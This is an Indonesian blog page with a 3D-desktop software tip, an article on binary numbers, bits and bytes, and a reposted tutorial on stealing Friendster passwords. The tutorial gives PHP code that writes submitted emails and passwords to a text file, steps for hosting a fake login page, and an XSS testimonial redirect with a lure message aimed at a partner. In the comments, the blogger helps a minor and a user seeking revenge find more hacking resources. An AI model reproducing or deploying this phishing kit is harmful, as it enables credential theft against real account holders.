Tampilkan postingan dengan label masukan. Tampilkan semua postingan
Tampilkan postingan dengan label masukan. Tampilkan semua postingan

Rabu, 14 Mei 2008

membuat desktop 3 d di vista

membuat desktop 3 d di vista

Membuat desktop dapat berputar bukan saja dapat dilihat di sistem operasi linux atau open source tetapi vista atau xp
dapat juga melakukannya.Cukup dengan menggunakan software Yodm3D anda dapat menikmati desktop 3 D.
software tersebut dapat di download di link :
1.http://www.softpedia.com/progDownload/Yod-m-3D-Download-70702.html
2.http://download1us.softpedia.com/dl/b4b14856fb1702b083aab25ef56be8e9/48295df7/100070702/software/os_enhance/Yodm3D.zip
3.http://chsalmon.club.fr
Semoga dengan artikel ini dapat menambah koleksi software anda...............

source code c bintang

Cara MengHack Friendster
written by yudhi_blog at Wednesday, December 12, 2007
Hola,,,

Setelah mencari ide apa yang artikel apa yang harus dimasukan kedalam blog saya. akhirnya saya memutuskan untuk mencari artikel tentang cara menghacking password Friendster karena banyak teman - teman saya yang menyarankan untuk memasukan artikel tersebut agar mereka mudah untuk membacanya tanpa perlu memakai search engine segala. dan setelah goggling sejenak akhirnya saya dapat juga di jasakom.com. nah ini dia selamat membaca. GBU

Penerapan Social Engineering untuk mendapatkan password di Friendster
Date: Wednesday, February 14, 2007 Hits: 14195 By: numpang_lewat
Artikel ini ditujukan bahwa ” Hacking tidak selamanya menggunakan TOOLS “. So bagi para 3133t sebaiknya tidak membaca ARTIKEL ini jika anda tidak ingin mual, perut kembung, bibir pecah2, kepala senut2.. dll.

Artikel ini diperuntunkan bagi anda tertarik, cinta, haus ilmu dari Social Engineering….

Sekali lagi Artikel ini hanya ditujukan bagi temen2 yg belum mengetahui teknik ini. Jika temen2(terutama for 3133t) Sudah tahu teknik ini SAYA MOHON STOP!! STOP!! STOP!! STOP!! STOP!! STOP!! tetapi bila anda tetap sja Ngotot ingin meneruskan saya tidak bisa memaksa anda…

Lanjutt ….

Akhir-akhir ini banyak yg membicarakannya, bahkan sedang menjadi berita hangat. Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu. Sebagaimna telah dijelaskan pada artikel sebelumnya (WuPz, jagonya dll). Testimonial Redirect bisa jadi berabe bgt kalo disalah gunakan. Artinya?? cara tersebut bisa digunain buat ngedapetin password, cookies, or perhatian lebih dari doi ama kita ;)) n laen-laen .. .

So langsung saja kita menuju acara puncak …

Pertama-tama yg mesti kita siapin :

1. Teh manis penghangat malam.
2. Jangan Lupa cemilan yg bikin Kriuk .. kriuk …
3. Web Hosting yg support PHP. Cari di paman Google banyak..
4. Upload file index.htm (ada di source).

5. Sertakan code php dan JavaScript di bawah ini dan ” SAVE As ” sesuai dg nama link yg dituju pada Form Login.

$email = $_POST[email];
$password = $_POST[password];
$fl = fopen(’password.txt’, ‘a’);
fwrite($fl, “$email . $password \n\n”);
fclose($fl);

?>



Dan upload file diatas ke www.webyangsupportphp.com

6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.

7. kirim testi dg :

hai syang .. gimna kabarna, kagen nie ..

nah .. Setelah sang pacar penerima testi membuka “New Testimonials”, maka sesuai dg perintah yang berada di JavaScript => window.location <= yg disisipkan maka link akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tanpa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan dg rela hati mengisi Form login tipuan.
Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh. Si pengirim testi menawarkan jasanya untuk sang pacar tercinta… =] :))

Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan ” OVERLAY GENERATOR ” pada profil fs pada saat pengiriman testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm maka pada saat pengiriman data akan menuju ke http://webyangsupportphp.com/login.php

Kesimpulan :

# Hacking tidak selamanya menggunakan ” TOOLS “
# Kelemahan XSS merupakan bahaya besar
# Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri !!!!

Thanks To :

Allah SWT
———


$Jasakom Community
$Aat Shadewa - thanks 4 your knowledge.
Labels: Tutorial Umum Email Post »

Anonymous said...
mas cara untuk buat webcounter di blogger gimana caranya

Thank's
3:44 PM
yudhi said...
klo kamu mau buat web counter gampang qo!!kmu klik aja ini http://www.webcounter.com/ dan kmu ikuti instruksi selanjutnya.klo kmu ga bs juga bru kmu tanya lgi ya???thnks too
1:05 AM
whitehat_70 said...
lagi2 fs,, dah lah kasian uh dya..

ini web mang memunkinkan testi yg bisa input script di dalemnya..
ya jelas ja banyak kelemahannya lah..

coba nih hack lewat comment blogger yg cuman bisa 'bbrapa' tag HTML doang ?? bisa !??
12:48 PM
Anonymous said...
maz tolong q...
q abiz di kerjain m temenq hancurin fs q
q pgn blaez dia
bisa jelasin lebih rinci gak..
q bener-bener tersiksa gara2 ini
pliz
7:52 PM
aziz said...
maz maksudnya

4. Upload file index.htm (ada di source).

apa

source itu apa......

jangan kaget q masih umur13 thn soalna jadi gtw itu maksudnya
8:10 PM
yudhi_blog said...
untuk anonim kalo kamu mw belajar tntg cara menghack FS kamu klik aja ini www.yogyafree.net n kmu disana bs belajar bnyk bgt tntg hack coz aku ga bs smp bntu trlalu jauh aku cuma bntu kamu gni aja yah??untuk lebih lnjutnya kmu blajr dri website itu aja.tar klo ada yang ga ngrti bru kmu tny aku lg yah??thnks


untuk aziz untuk source itu adalh code untuk menghack FS kmu hrus pny website dlu.kmu dftar grtis dlu aja di www.geocities.com or www.googlepages.com.key??mksh ats kunjungannya.
9:33 AM
aziz said...
klo blog ga boleh ta...

masa haruz website
2:23 PM
yudhi_blog said...
untuk aziz ywdh nnti aku cariin cara hack FS yg lbih simple.key??ditunggu aja
12:03 PM
Anonymous said...
boz..gw kan da ada web ndiri.
gw bkin di www.bravenet.com

Sabtu, 10 Mei 2008

binner, byte dan bit dalam digital
Kalau kita melihat pameran komputer atau pameran alat-alat digital lainnya, pasti banyak dijumpai istilah-istilah yang membuat penasaran. Apalagi bagi yang ingin tahu performa atau kemampuan alat yang akan dibeli. Yuk, kita pelajari!
Ada komputer dengan RAM (Random Access Memory) DDR/SDR berkapasitas 256 MB (Mega Byte), ada HDD (Hard Disk Drive) ukuran 40 GB (Giga Byte), juga modem dengan kecepatan 56 kbps (kilo bit per second). Masih ada lagi, kamera foto digital dengan 8 MB built in memory. Dan, kalau lihat iklan, ada handphone yang mampu menghasilkan 4.096 warna.<>
Nah, berbeda dengan Giga, Mega, dan Kilo yang sudah umum digunakan dalam banyak satuan, byte dan bit hanya dipahami oleh orang yang tahu dunia digital. Istilah bit dan byte muncul pada bilangan dasar/radix dua. Bilangan dasar 2 yang populer dengan nama bilangan biner (binary) ini digunakan dalam dunia digital karena dapat mewakili sistem digital yang hanya mengenal 2 level/kondisi (hidup atau mati).
Bilangan biner
Jika bilangan desimal (radix/dasar 10) mempunyai simbol 0,1,2,3,4,5,6,7,8,9, bilangan dasar 2 atau biner hanya mempunyai dua simbol, yaitu 0 dan 1. Dalam sistem digital, bilangan 0 digunakan untuk mewakili kondisi off/non-aktif, sedangkan bilangan 1 digunakan untuk mewakili kondisi on/aktif.
Pertanyaannya: "Dengan hanya dua simbol bilangan itu, bagaimana cara menuliskan angka-angka yang nilainya lebih besar dari satu, misalnya, dua, sembilan, lima belas, dua puluh, atau lainnya?"
Untuk bilangan desimal, nilai nol hingga sembilan ditulis dalam satu digit simbol bilangan (yaitu 0,1,2,3,4,5,6,7,8, atau 9 saja). Nilai-nilai yang lebih besar dari sembilan ditulis dengan kombinasi 2 digit simbol atau lebih. Kombinasi itu ditulis dengan memperhatikan bobot tempat.
Bobot tempat untuk bilangan desimal adalah : … 10 pangkat 5, 10 pangkat 4, 10 pangkat 3, 10 pangkat 2, 10 pangkat 1, 10 pangkat 0.… Dengan pangkat itu, urutan nilai yang dihasilkan adalah … 100.000, 10.000, 1.000, 100, 10, 1…. Kemudian, kita dapat mengisi maksimal nilai sembilan untuk tiap tempat berbobot. Dalam pelajaran di sekolah dasar, penggambaran bobot tempat ini dibuat dalam bentuk "tusuk sate" yang tersusun sejajar di papan.
Dengan bobot tempat semacam itu, satu biji "sate" yang diletakkan pada tiang atau tempat satuan (10 pangkat 0) akan bernilai satu dan disimbolkan dengan 1. Sementara satu biji "sate" yang diletakkan pada tiang atau tempat ratusan (10 pangkat 2) akan bernilai seratus dan disimbolkan dengan 100. Jadi, nilai delapan belas diperoleh dengan meletakkan satu biji "sate" di tiang puluhan dan delapan biji "sate" di tiang satuan. Nilai seratus delapan puluh diperoleh dengan meletakkan satu biji "sate" di tiang ratusan dan delapan biji "sate" di tiang puluhan. Pokoknya, nilai bilangan bergantung pada jumlah biji "sate" dan tempat peletakannya.
Cara serupa juga dilakukan untuk bilangan biner. Bobot tempat untuk bilangan biner adalah … 25, 24, 23, 22, 21, 20…. Dengan pangkatnya, urutan nilainya dapat ditulis dengan … 32, 16, 8, 4, 2, 1…. Ternyata bilangan biner tidak mengenal puluhan, ratusan, ribuan, dst, tetapi dua-an, empat-an, delapan-an, dst. Jika tiap tempat berbobot dalam bilangan desimal dapat diisi maksimal sembilan biji "sate", tiap tempat dalam bilangan biner hanya dapat diisi maksimum satu biji saja sehingga tiap tempat hanya punya dua kemungkinan, berisi satu atau tidak berisi.
Dengan format semacam itu, penyusunan di tiap tempat akan menghasilkan nilai-nilai tertentu. Peletakan satu biji pada tempat berbobot 32,8, dan 1 akan menghasilkan simbol bilangan biner 101001. Simbol itu mewakili nilai 32 + 8 + 1 = 41. Contoh lain, peletakan satu biji pada tempat berbobot 8, 4, 2, dan 1 akan menghasilkan simbol biner 1111, yang mewakili nilai 15. Cara praktis ini dapat kita gunakan untuk mengonversi simbol bilangan desimal ke biner dan atau sebaliknya.
Bit (BInary digiT) dan byte
Satuan bit (binary digit) digunakan untuk menunjukkan panjang bilangan biner. Bilangan biner 1001 mempunyai panjang 4 bit, bilangan biner 10110 mempunyai panjang 5 bit, sedangkan 10101101 mempunyai panjang 8 bit.
Byte adalah satuan yang menunjukkan deretan bilangan biner dengan panjang 8 bit. Atau gampangnya, 1 byte = 8 bit. Jadi, bilangan biner 20 byte mempunyai ukuran 20 x 8 bit = 160 bit. Sebenarnya, masih ada satu satuan lagi yang kurang populer. Satuan itu adalah nibble, yang menunjukkan deretan bilangan biner sepanjang 4 bit. Hubungan antara bit, nibble, dan byte adalah 1 byte = 2 nibble = 8 bit.
Kode-kode biner
Kode-kode biner digunakan untuk membawa informasi angka, huruf, karakter (", ;, spasi, $$, @, dan lain-lain), gambar, warna, atau apa saja. Kode-kode ini digunakan selama proses pengolahan, pengiriman, penerimaan, perekaman, dan pembacaan data. Tetapi, pada akhirnya kode ini akan diubah kembali menjadi informasi asal.
Kode biner terdiri dari banyak jenis. Salah satunya adalah jenis kode yang membawa informasi angka saja. Contoh kode ini adalah kode biner murni, seperti yang dijelaskan di atas.
Jenis lainnya adalah kode BCD (Binary Coded Decimal), yang banyak digunakan di rangkaian counter, speedometer, jam digital. Berbeda dengan kode biner murni, kode ini menempatkan 4 bit untuk tiap digit bilangan desimal. Jadi, kode BCD untuk angka 41 adalah 0100 0001. Empat bit di kiri mewakili digit 4 desimal, sedangkan empat bit di kanan mewakili digit 1 desimal. Untuk angka 15, kode BCD-nya adalah 0001 0101. Bandingkan dengan kode biner murni di atas.
Selain itu, ada kode alfanumerik yang digunakan untuk membawa informasi karakter: angka, huruf, dan tanda baca atau karakter lain. Kode alfanumerik yang populer adalah kode ASCII (American Standard Code for Information Interchange). Kode ASCII digunakan untuk komunikasi antara keyboard komputer dengan CPU (Central Processing Unit) dan komunikasi antarkomputer.
Pada awalnya, kode ASCII menyediakan 7 bit untuk mewakili 128 karakter angka, huruf, dan tanda baca lainnya. Setelah itu, ia dikembangkan lagi menjadi 8 bit sehingga dapat digunakan untuk mewakili 256 karakter. Tabel daftar karakter kode ASCII mudah dijumpai di buku-buku aplikasi komputer.
Contoh kode alfanumerik lainnya adalah EBCDIC (Extended Binary Coded Decimal Interchange Code). Kode yang digunakan dalam komputer-komputer produksi IBM ini mempunyai panjang 8 bit.
Selain itu, ada juga kode-kode yang digunakan untuk membawa informasi gambar, warna, atau untuk keperluan-keperluan lain. Yang saat ini banyak dikembangkan adalah kode-kode pendeteksi dan perbaikan kesalahan.
Kode pendeteksi dan perbaikan kesalahan dipakai untuk keperluan pengiriman atau perekaman data digital. Dengan mengaplikasikan kode ini, kesalahan pembacaan atau penerimaan data digital akibat gangguan selama proses pengiriman atau perekaman dapat dikurangi sehingga semaksimal mungkin dapat diperoleh data aslinya. Contoh kode pendeteksi dan perbaikan kesalahan adalah kode CRC, Reed Solomon (yang banyak diterapkan untuk komunikasi wireless), Turbo code (yang mempunyai kecepatan tinggi).
Jumlah kombinasi vs panjang bit
Semakin panjang bit dari kode akan menambah jumlah kombinasi yang dihasilkan oleh kode tersebut. Jumlah kombinasi yang dihasilkan oleh kode dengan panjang n bit adalah 2 pangkat n. Dengan demikian, kode biner dengan panjang 1 bit hanya akan menghasilkan dua kombinasi, yaitu 0 dan 1. Kode biner 2 bit menghasilkan 4 kombinasi, yaitu 00, 01, 10, dan 11, sedangkan kode biner 3 bit menghasilkan 8 kombinasi dengan urutan 000, 001, 010, 011, 100, 101, 110, 111.
Jadi, untuk mewakili seluruh karakter angka (0-9) dan abjad (a-z, A-Z) yang berjumlah 62 dibutuhkan kode dengan panjang 6 bit (yang menghasilkan 64 kombinasi). Kode 6 bit ini menyisakan 2 kombinasi yang tidak terpakai. Kode dengan panjang 5 bit tidak dapat dipakai karena hanya menghasilkan 32 kombinasi.
Untuk kode ASCII yang juga memasukkan banyak karakter tanda baca lain, panjang 6 bit itu jelas tidak cukup. Karena itu, ia menyediakan panjang 7 bit yang dapat menghasilkan 128 kombinasi kode. Pada pengiriman data serial antarkomputer, kode ASCII 7 bit ini ditambah 1 bit paritas, yang berfungsi sebagai deteksi kesalahan. Karena itu, pada komunikasi komputer, umumnya dikirim 8 bit = 1 byte data. Panjang 1 byte ini juga populer untuk kode-kode lainnya.
Kilo dan Mega dalam bilangan biner
Dalam bilangan biner, 1 kb (kilobit) tidak identik dengan 1.000 bit, melainkan 1.024 bit yang dihasilkan dari 2 pangkat 10. Angka 2 kb identik dengan 2.048 bit yang dihasilkan dari 2 pangkat 11, dan angka 4 kb identik dengan 4.096 bit yang dihasilkan dari 2 pangkat 12.
Jadi, handphone yang "katanya" mampu menghasilkan 4.096 warna kemungkinan besar mempunyai kode dengan panjang 12 bit untuk mendapatkan kombinasi warnanya. Sementara modem dengan kecepatan 56 kbps dapat mengirim data digital dengan kecepatan 56 x 1.024 = 57.344 bit tiap detiknya.
Untuk memory (RAM, ROM, CD, disket), satuan dasar yang biasa digunakan adalah byte karena lebar data yang biasa digunakan adalah 1 byte (8 bit). Jika penyimpanan data digambarkan dalam bentuk baris dan kolom, lebar kolom menunjukkan lebar data (biasanya kelipatan 8 bit), sedangkan jumlah baris menunjukkan banyaknya data.
Jumlah baris tergantung pada panjang bit kode penunjuk baris. Jika panjang kode penunjuk baris adalah 16 bit, ia dapat menyimpan 2 pangkat 16 = 65.536 baris data. Jadi, jika dalam bentuk baris dan kolom sebuah memori mempunyai 8 kolom dan 65.536 baris, ia disebut memiliki kapasitas sebesar 65.536 byte atau 64 kbyte. Nah, bisa dibayangkan, berapa banyak baris dan kolom yang disediakan untuk memori dengan kapasitas beberapa puluh Mega atau Giga byte.
PRIHADI MURDIYAT Mahasiswa S2 Telekomunikasi Multimedia ITS

Selasa, 08 April 2008

Sabtu, 22 Maret 2008

Kunjungi Blog Saya Kita Bisa Berbagi Ilmu

Karena "manusia tidak bisa hidup sendiri"